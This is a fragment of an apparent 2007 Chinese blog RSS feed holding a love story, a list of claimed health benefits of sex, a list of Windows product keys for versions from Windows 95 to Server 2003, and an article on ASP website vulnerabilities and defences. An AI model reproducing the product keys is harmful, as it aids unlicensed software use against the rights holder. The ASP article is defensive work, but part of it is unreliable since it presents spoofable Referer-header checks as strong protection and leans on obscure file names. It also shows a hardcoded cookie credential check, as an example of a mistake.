<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[一页书]]></author>
	    <comments>http://zhujiang8106.blog.163.com/blog/static/4191824020079751259927</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://zhujiang8106.blog.163.com/blog/static/4191824020079751259927</guid>
    <pubDate>Sun, 7 Oct 2007 17:12:59 +0800</pubDate>
    <dcterms:modified>2007-10-09T04:00:15+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[所以女孩看了都不会分手]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/419182402007918202476</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">多么希望你知道，我是你的打火机，靠着你的身体，感受你的气息。用我小小的身躯，点燃你一刻的快意。用那闪闪的火苗，燎亮你心中的孤寂。是我的暖暖气息，改变了，改变了你的呼吸。&nbsp;某天&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">女孩终于鼓起勇气对男孩说：「我们分手吧」&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">男孩问：「为什么？」&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">女孩说：「倦了，就不需要理由了」&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">一个晚上&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">男孩只抽烟不说话&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">女孩的心也越来越凉&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">『连挽留都不会表达的情人，能给我什么样的快乐？』&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">过了许久&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">男孩终忍不住说：［怎么做你才能留下来？］&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">女孩慢慢地说：「回答一个问题，如果你能答到我心里就答案，我就留下来。」&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">「比如我非常喜欢悬崖上的一朵花，而你去摘的结果是百分之百的死亡，你会不会摘给我？」&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">男孩想了想说：「明天早晨告诉你答案好吗？」&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">女孩的心顿时……………………&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">早晨醒来，男孩已经不在&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">只有一张写满字的纸压在温热的牛奶杯下&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">第一行，就让女孩的心凉透了&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">「亲爱的，我不会去摘但请容许我陈述不去摘的理由&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">你只会用电脑</A>打字，却总把程序弄得一塌糊涂&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">然后对着键盘哭，我要留着手指给你整理程序；&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">你出门总是忘记带钥匙，我要留着双脚跑回来给你开门&nbsp;；&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">酷爱旅游的你，在自己的城市里都常常迷路，我要留着眼睛给你带路；&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">每月（好朋友）光临时，你总是全身冰凉，还肚子疼，我要留着掌心温暖你的小腹；&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">你不爱出门，我担心你会患上自闭症，我要留着嘴巴躯赶你的寂寞；&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">你总是盯者电脑，眼睛给糟蹋得已不是太好了，我要好好活着，等你老了，给你修剪指甲，帮你拔掉让你懊恼的白发，拉着你的手，在海边享受美好的阳光和柔软的沙滩，告诉你一朵朵花的颜色，像你青春的脸…&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">所以&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">在我不能确定有人比我更爱你以前，我不想去摘那朵花…」&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">（女孩泪滴在纸上，形成晶莹的花朵）&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">抹净眼泪，女孩继续往下看：&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">「亲爱的&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em"><WBR></P>
<P style="TEXT-INDENT: 2em">如果你已经看完了&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">答案还让你满意的话&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">请你开门吧！我正站在门外，手里提着你最喜欢吃的鲜奶面包…」&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">女孩拉开门&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">看见他的脸，紧张得像个孩子&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">只会把拧着面包的手在她眼前晃．．．．．．&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">我想这就是爱情</A>或者生活&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">被幸福平静的包围时&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">一些平凡的爱意&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">总被渴望激情和浪漫的心忽略&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">爱！在双方引起的许多个微不足道的动作里，&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">从来就没有固定的模式&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">只有爱&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">可以是任何一中平淡无奇的形式&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">花朵、浪漫&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">不过是浮在生活表面的浅浅点缀&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">在它们的下面才是我们真真的生活<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[一页书]]></author>
	    <comments>http://zhujiang8106.blog.163.com/blog/static/419182402007918202476</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://zhujiang8106.blog.163.com/blog/static/419182402007918202476</guid>
    <pubDate>Mon, 1 Oct 2007 20:20:24 +0800</pubDate>
    <dcterms:modified>2007-10-01T20:20:24+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[****的10大好处，一大坏处(未满18请绕行)]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/419182402007918193538</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">一﹑性爱可摧毁压力，舒缓紧张：</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;在进行性爱的过程之中，人体荷尔蒙的释放使我们无法感到压力。这个反应甚至可以维持数小时之久，直至荷尔蒙的水平回复整个身体系统</A>的正常水平之中。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;二﹑性爱可以帮助你入睡：</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;性爱时身体上的努力和情绪上的高涨会是完美的引擎，引你驶入梦乡。肌肉在兴奋时紧张，并在事后回复松弛，这个过程很明显地有助于休息和睡眠。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;三﹑性爱可以保持青春：</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;英国药物研究中心的医生兼辅导专家约翰说：假如你不使用你的性器官，那么它会倾向于退化。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;性生活可提高****的润滑程度，并且滋润****。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;四﹑性可以提高自信心：</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;你有定期的性生活表现出你和你的伴侣已爱着对方。性爱时易于达到高潮会觉得自己更有吸引力，提高你的自信心。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;五﹑性爱能够改变你的外观：</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;性爱时的刺激和运动会导致肾上腺素产生。这些荷尔蒙能够提高皮肤的透明度，使它看起来明亮透彻一些，人亦漂亮一些。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;六﹑性爱使你和你的伴侣更亲密，包括情绪上和肉体上：</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;当你和你的伴侣的关系倾向好的发展时，你俩的性生活也会倾向更好。你们可以通过性来向对方作好的沟通，从而更显恩爱。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;七﹑性爱可舒缓经痛：</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;****时所释放的荷尔蒙能松弛引起经痛的拉力。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;八﹑性爱可以帮助延寿：</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;有证据显示婚姻美满的较单身和离婚的更长寿，当中与美满婚姻与性生活有莫大的关系。不论生理上和心理上，作爱有益健康。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;九﹑性爱对心和血液循环系统有裨益：</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;性爱可提高你的心跳率和血压。假如你有激烈的运动，可对心血管系统达到良好的运动量。史密夫博士表示，偶尔加速你的心跳率不会有任何害处,这是舒展你的心血管系统的另一种方法，因此有“1周****3次心脏病不上门”之说。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;十﹑性爱燃烧卡路里，有助保持苗条：</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;据调查显示，一个热烈的接吻燃烧十二卡路里，而十分钟的爱抚亦可燃烧五十卡路里。既使最迟缓的****，亦可每小时燃烧二百卡路里，相应，假如在这过程中你非常之热烈和兴奋的话，燃烧五六百卡路里是可想而知的。</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;只有一个坏处就是会生孩子&nbsp;----------哈哈。。&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[一页书]]></author>
	    <comments>http://zhujiang8106.blog.163.com/blog/static/419182402007918193538</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://zhujiang8106.blog.163.com/blog/static/419182402007918193538</guid>
    <pubDate>Mon, 1 Oct 2007 20:19:03 +0800</pubDate>
    <dcterms:modified>2007-10-01T20:19:03+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[win2003序列号---windows操作系统序列号大全]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/41918240200783055246825</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD vAlign=top align=middle width="2%" bgColor=white></TD>
<TD vAlign=top align=middle bgColor=white>
<TABLE cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD ?></TD></TR>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>&nbsp;</TD></TR>
<TR>
<TD></TD></TR>
<TR>
<TD>
<P></P>
<P style="TEXT-INDENT: 2em">&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD height=3>&nbsp;</TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0>
<TBODY>
<TR>
<TD>
<P style="TEXT-INDENT: 2em">windows操作系统序列号大全</P>
<P style="TEXT-INDENT: 2em">PWIN95 S/N: 425-0022172</P>
<P style="TEXT-INDENT: 2em">EWIN95 S/N: 111-1111111</P>
<P style="TEXT-INDENT: 2em">CWIN97 S/N: 26495-OEM-0004782-75026</P>
<P style="TEXT-INDENT: 2em">EWIN97 S/N: 00100-OEM-0123456-00100</P>
<P style="TEXT-INDENT: 2em">PWIN97 S/N: 00100-OEM-0123456-00100</P>
<P style="TEXT-INDENT: 2em">CWIN98 S/N: DC688-DET96-5SCN7-E5RLK-XL413</P>
<P style="TEXT-INDENT: 2em">EWIN98 S/N: K4HVD-Q9TJ9-6CRX9-C9G68-RQ2D3</P>
<P style="TEXT-INDENT: 2em">PWIN98 S/N: VR9TR-74M8W-YPT9C-4VDF4-R7PD8</P>
<P style="TEXT-INDENT: 2em">PWIN98 OEM(第二版) S/N: BBH2G-D2VK9-QD4M9-F63XB-43C33</P>
<P style="TEXT-INDENT: 2em">PWIN98 2A 2222版&nbsp;&nbsp; S/N: QY7TT-VJ7VG-7QPHY-QXHD3-B838Q</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MB9HY-M4JGJ-B3RV2-FPH8D-FP8KY</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WHWGP-XDR8Y-GR9X3-863RP-67J2T</P>
<P style="TEXT-INDENT: 2em">Windows98(第三版)th OEM 升级程序密码:1</P>
<P style="TEXT-INDENT: 2em">Windows98(第三版)th OEM 密码:QY7TT-VJ7VG-7QPHY-QXHD3-B838Q</P>
<P style="TEXT-INDENT: 2em">WINDOWS ME 简体中文正式零售版</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; S/N: HJPFQ-KXW9C-D7BRJ-JCGB7-Q2DRJ</P>
<P style="TEXT-INDENT: 2em">WINDOWS ME 正式英文零售版</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; S/N: RBDC9-VTRC8-D7972-J97JY-PRVMG</P>
<P style="TEXT-INDENT: 2em">PwindowsXP:简体中文正式零售版</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; S/N:FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8</P>
<P style="TEXT-INDENT: 2em">Windows XP 专业版 : CCC64-69Q48-Y3KWW-8V9GV-TVKRM</P>
<P style="TEXT-INDENT: 2em">Windows XP 家庭版 : BQJG2-2MJT7-H7F6K-XW98B-4HQRQ</P>
<P style="TEXT-INDENT: 2em">Windows 2000 Professional&nbsp;&nbsp; :&nbsp;&nbsp;&nbsp;&nbsp; PQHKR-G4JFW-VTY3P-G4WQ2-88CTW</P>
<P style="TEXT-INDENT: 2em">Windows 2000 Server&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; :&nbsp;&nbsp;&nbsp;&nbsp; H6TWQ-TQQM8-HXJYG-D69F7-R84VM</P>
<P style="TEXT-INDENT: 2em">Windows 2000 Advanced Server:&nbsp;&nbsp;&nbsp;&nbsp; RBDC9-VTRC8-D7972-J97JY-PRVMG</P>
<P style="TEXT-INDENT: 2em">windows NT Server 4.0 sn: 727-1111111</P>
<P style="TEXT-INDENT: 2em">windows NT WorkStation 4.0 sn: 727-1111111</P>
<P style="TEXT-INDENT: 2em">Windows 98 Second Edition sn: QY7TT-VJ7VG-7QPHY-QXHD3-B838Q</P>
<P style="TEXT-INDENT: 2em">Windows2003的序列号：</P>
<P style="TEXT-INDENT: 2em">JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY</P>
<P style="TEXT-INDENT: 2em">windows2003序列号：</P>
<P style="TEXT-INDENT: 2em">cky24-q8qrh-x3kmr-c6bcy-t847y</P>
<P style="TEXT-INDENT: 2em">win2003有三种版本：</P>
<P style="TEXT-INDENT: 2em">win2003 Enterprise Server:&nbsp;&nbsp;&nbsp;&nbsp; QW32K-48T2T-3D2PJ-DXBWY-C6WRJ</P>
<P style="TEXT-INDENT: 2em">win2003 Standard Server:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M6RJ9-TBJH3-9DDXM-4VX9Q-K8M8M</P>
<P style="TEXT-INDENT: 2em">win2003 Web Server:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;D42X8-7MWXD-M4B76-MKYP7-CW9FD</P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></P></div>]]></description>
	    <author><![CDATA[一页书]]></author>
	    <comments>http://zhujiang8106.blog.163.com/blog/static/41918240200783055246825</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://zhujiang8106.blog.163.com/blog/static/41918240200783055246825</guid>
    <pubDate>Sun, 30 Sep 2007 17:52:46 +0800</pubDate>
    <dcterms:modified>2007-09-30T17:52:46+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[ASP网站的漏洞分解以及入侵防范方法]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/41918240200783055051118</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD></TD></TR>
<TR>
<TD>
<P style="TEXT-INDENT: 2em">&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD height=3></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0>
<TBODY>
<TR>
<TD>
<P style="TEXT-INDENT: 2em">如何更好的达到防范黑客攻击，本人提一下个人意见！第一，免费程序不要真的就免费用，既然你可以共享原码，那么攻击者一样可以分析代码。如果在细节上注意 防范，那样你站点的安全性就大大的提高了。即使出现了SQL Injection这样的漏洞，攻击者也不可能马上拿下你的站点。 </P>
<P style="TEXT-INDENT: 2em">　　由于ASP的方便易用，越来越多的网站后台程序都使用ASP脚本语言。但是， 由于ASP本身存在一些安全漏洞，稍不小心就会给黑客提供可乘之机。事实上，安全不仅是网管的事，编程人员也必须在某些安全细节上注意，养成良好的安全习 惯，否则会给自己的网站带来巨大的安全隐患。目前，大多数网站上的ASP程序有这样那样的安全漏洞，但如果编写程序的时候注意一点的话，还是可以避免的。</P>
<P style="TEXT-INDENT: 2em">　　1、用户名与口令被破解</P>
<P style="TEXT-INDENT: 2em">　　攻击原理：用户名与口令，往往是黑客们最感兴趣的东西，如果被通过某种方式看到源代码，后果是严重的。</P>
<P style="TEXT-INDENT: 2em">　　防范技巧：涉及用户名与口令的程序最好封装在服务器端，尽量少在ASP文件里出现，涉及与数据库连接的用户名与口令应给予最小的权限。出现次数多的用户 名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及与数据库连接，在理想状态下只给它以执行存储过程的权限，千万不要直接给予该用户修改、插入、删 除记录的权限。 </P>
<P style="TEXT-INDENT: 2em">　　2、验证被绕过</P>
<P style="TEXT-INDENT: 2em">　　攻击原理：现在需要经过验证的ASP程序大多是在页面头部加一个判断语句，但这还不够，有可能被黑客绕过验证直接进入。</P>
<P style="TEXT-INDENT: 2em">　　防范技巧：需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从上一页面转进来的会话才能读取这个页面。</P>
<P style="TEXT-INDENT: 2em">　　3、inc文件泄露问题</P>
<P style="TEXT-INDENT: 2em">　　攻击原理：当存在ASP的主页正在制作且没有进行最后调试完成以前，可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎对这些<A href="http://www.123z.cn/">网页[www.123z.cn]</A>进行查找，会得到有关文件的定位，并能在浏览器中查看到数据库地点和结构的细节，并以此揭示完整的源代码。</P>
<P style="TEXT-INDENT: 2em">　　防范技巧：程序员应该在<A href="http://www.123z.cn/">网页[www.123z.cn]</A>发布前对它进行彻底的调试；安全专家则需要加固ASP文件以便外部的用户不能看到它们。首先对.inc文件内容进行加密，其 次也可以使用.asp文件代替.inc文件使用户无法从浏览器直接观看文件的源代码。inc文件的文件名不要使用系统默认的或者有特殊含义容易被用户猜测 到的名称，尽量使用无规则的英文字母。</P>
<P style="TEXT-INDENT: 2em">　　4、自动备份被下载</P>
<P style="TEXT-INDENT: 2em">　　攻击原理：在有些编辑ASP程序的工具中，当创建或者 修改一个ASP文件时，编辑器自动创建一个备份文件，比如：UltraEdit就会备份一个.bak文件，如你创建或者修改了some.asp，编辑器会 自动生成一个叫some.asp.bak文件，如果你没有删除这个bak文件，攻击者可以直接下载some.asp.bak文件，这样some.asp的 源程序就会被下载。</P>
<P style="TEXT-INDENT: 2em">　　防范技巧：上传程序之前要仔细检查，删除不必要的文档。对以BAK为后缀的文件要特别小心。</P>
<P style="TEXT-INDENT: 2em">　　5、特殊字符</P>
<P style="TEXT-INDENT: 2em">　　攻击原理：输入框是黑客利用的一个目标，他们可以通过输入脚本语言等对用户客户端造成损坏；如果该输入框涉及数据查询，他们会利用特殊查询语句，得到更 多的数据库数据，甚至表的全部。因此必须对输入框进行过滤。但如果为了提高效率仅在客户端进行输入合法性检查，仍有可能被绕过。</P>
<P style="TEXT-INDENT: 2em">　　防范 技巧：在处理类似留言板、BBS等输入框的ASP程序中，最好屏蔽掉HTML、JavaScript、VBScript语句，如无特殊要求，可以限定只允 许输入字母与数字，屏蔽掉特殊字符。同时对输入字符的长度进行限制。而且不但要在客户端进行输入合法性检查，同时要在服务器端程序中进行类似检查。</P>
<P style="TEXT-INDENT: 2em">　　6、数据库下载漏洞</P>
<P style="TEXT-INDENT: 2em">　　攻击原理：在用Access做后台数据库时，如果有人通过各种方法知道或者猜到了服务器的Access数据库的路径和数据库名称，那么他也能够下载这个Access数据库文件，这是非常危险的。</P>
<P style="TEXT-INDENT: 2em">　　防范技巧：</P>
<P style="TEXT-INDENT: 2em">　　(1)为你的数据库文件名称起个复杂的非常规的名字，并把它放在几层目录下。所谓 "非常规"， 打个比方说，比如有个数据库要保存的是有关书籍的信息， 可不要给它起个"book.mdb"的名字，而要起个怪怪的名称，比如d34ksfslf.mdb， 并把它放在如./kdslf/i44/studi/的几层目录下，这样黑客要想通过猜的方式得到你的Access数据库文件就难上加难了。</P>
<P style="TEXT-INDENT: 2em">　　(2)不要把数据库名写在程序中。有些人喜欢把DSN写在程序中，比如： </P>
<P style="TEXT-INDENT: 2em">　　DBPath&nbsp;=&nbsp;Server.MapPath("cmddb.mdb") </P>
<P style="TEXT-INDENT: 2em">　　conn.Open&nbsp;"driver={Microsoft&nbsp;Access&nbsp;Driver&nbsp;(*.mdb)}；dbq="&nbsp;&amp;&nbsp;DBPath&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">　　</P>
<P style="TEXT-INDENT: 2em">　　假如万一给人拿到了源程序，你的Access数据库的名字就一览无余了。因此建议你在ODBC里设置数据源，再在程序中这样写：　&nbsp;</P>
<P style="TEXT-INDENT: 2em">　　conn.open"shujiyuan"</P>
<P style="TEXT-INDENT: 2em">　</P>
<P style="TEXT-INDENT: 2em">　　(3)使用Access来为数据库文件编码及加密。首先在"工具→安全→加密/解密数据库"中选取数据库(如：employer.mdb)，然后按确定，接着会出现"数据库加密后另存为"的窗口，可存为："employer1.mdb"。</P>
<P style="TEXT-INDENT: 2em">　　要注意的是，以上的动作并不是对数据库设置密码，而只是对数据库文件加以编码，目的是为了防止他人使用别的工具来查看数据库文件的内容。</P>
<P style="TEXT-INDENT: 2em">　　接下来我们为数据库加密，首先打开经过编码了的 employer1.mdb，在打开时，选择"独占"方式。然后选取功能表的"工具→安全→设置数据库密码"，接着输入密码即可。这样即使他人得到了 employer1.mdb文件，没有密码他也是无法看到 employer1.mdb中的内容。</P>
<P style="TEXT-INDENT: 2em">　　7、防范远程注入攻击 </P>
<P style="TEXT-INDENT: 2em">　　这类攻击在以前应该是比较常见的攻击方式,比如POST攻击,攻击者可以随便的改变要提交的数据值已达到攻击目的.又如:COOKIES 的伪造,这一点更值得引起程序编写者或站长的注意，不要使用COOKIES来做为用户验证的方式,否则你和把钥匙留给贼是同一个道理. </P>
<P style="TEXT-INDENT: 2em">　　比如: </P>
<P style="TEXT-INDENT: 2em">　　If&nbsp;trim(Request.&nbsp;cookies&nbsp;("uname"))="fqy"&nbsp;and&nbsp;Request.cookies("upwd")&nbsp;="fqy#e3i5.com"&nbsp;then&nbsp; </P>
<P style="TEXT-INDENT: 2em">……..more………&nbsp; </P>
<P style="TEXT-INDENT: 2em">End&nbsp;if&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">　　我想各位站长或者是喜好写程序的朋友千万别出这类错误,真的是不可饶恕.伪造COOKIES 都多少年了，你还用这样的就不能怪别人跑你的密码.涉及到用户密码或者是用户登陆时,你最好使用session 它才是最安全的.如果要使用COOKIES就在你的COOKIES上多加一个信息,SessionID,它的随机值是64位的,要猜解它,不可能.例: </P>
<P style="TEXT-INDENT: 2em">　　if&nbsp;not&nbsp;(rs.BOF&nbsp;or&nbsp;rs.eof)&nbsp;then&nbsp; </P>
<P style="TEXT-INDENT: 2em">login="true"&nbsp; </P>
<P style="TEXT-INDENT: 2em">Session("username"&amp;sessionID)&nbsp;=&nbsp;Username&nbsp; </P>
<P style="TEXT-INDENT: 2em">Session("password"&amp;&nbsp;sessionID)&nbsp;=&nbsp;Password&nbsp; </P>
<P style="TEXT-INDENT: 2em">'Response.cookies("username")=&nbsp;Username&nbsp; </P>
<P style="TEXT-INDENT: 2em">'Response.cookies("Password")=&nbsp;Password&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">　　</P>
<P style="TEXT-INDENT: 2em">下面我们来谈谈如何防范远程注入攻击,一般的攻击都是将单表提交文件拖到本地,将Form ACTION="chk.asp" 指向你服务器中处理数据的文件即可.如果你全部的数据过滤都在单表页上，那么恭喜你，你将已经被脚本攻击了. </P>
<P style="TEXT-INDENT: 2em">　　怎么才能制止这样的远程攻击?好办,请看代码如下: 程序体(9) </P>
<P style="TEXT-INDENT: 2em">　　</P>
<P style="TEXT-INDENT: 2em">&lt;%&nbsp; </P>
<P style="TEXT-INDENT: 2em">server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))&nbsp; </P>
<P style="TEXT-INDENT: 2em">server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))&nbsp; </P>
<P style="TEXT-INDENT: 2em">if&nbsp;mid(server_v1,8,len(server_v2))&lt;&gt;server_v2&nbsp;then&nbsp; </P>
<P style="TEXT-INDENT: 2em">response.write&nbsp;"&lt;br&gt;&lt;br&gt;&lt;center&gt;"&nbsp; </P>
<P style="TEXT-INDENT: 2em">response.write&nbsp;"&nbsp;"&nbsp; </P>
<P style="TEXT-INDENT: 2em">response.write&nbsp;"你提交的路径有误，禁止从站点外部提交数据请不要乱改参数！"&nbsp; </P>
<P style="TEXT-INDENT: 2em">response.write&nbsp;""&nbsp; </P>
<P style="TEXT-INDENT: 2em">response.end&nbsp; </P>
<P style="TEXT-INDENT: 2em">end&nbsp;if&nbsp; </P>
<P style="TEXT-INDENT: 2em">%&gt;&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">　　'个人感觉上面的代码过滤不是很好，有一些外部提交竟然还能堂堂正正的进来,于是再写一个. </P>
<P style="TEXT-INDENT: 2em">　　'这个是过滤效果很好,建议使用. </P>
<P style="TEXT-INDENT: 2em">　　</P>
<P style="TEXT-INDENT: 2em">if instr(request.servervariables("http_referer"),"http://"&amp;request.servervariables("host") )&lt;1 then response.write "处理 URL 时服务器上出错。</P>
<P style="TEXT-INDENT: 2em">　　如果您是在用任何手段攻击服务器，那你应该庆幸，你的所有操作已经被服务器记录，我们会第一时间通知公安局与国家安全部门来调查你的IP. " </P>
<P style="TEXT-INDENT: 2em">　　</P>
<P style="TEXT-INDENT: 2em">response.end&nbsp; </P>
<P style="TEXT-INDENT: 2em">end&nbsp;if&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">　　</P>
<P style="TEXT-INDENT: 2em">程序体(9) </P>
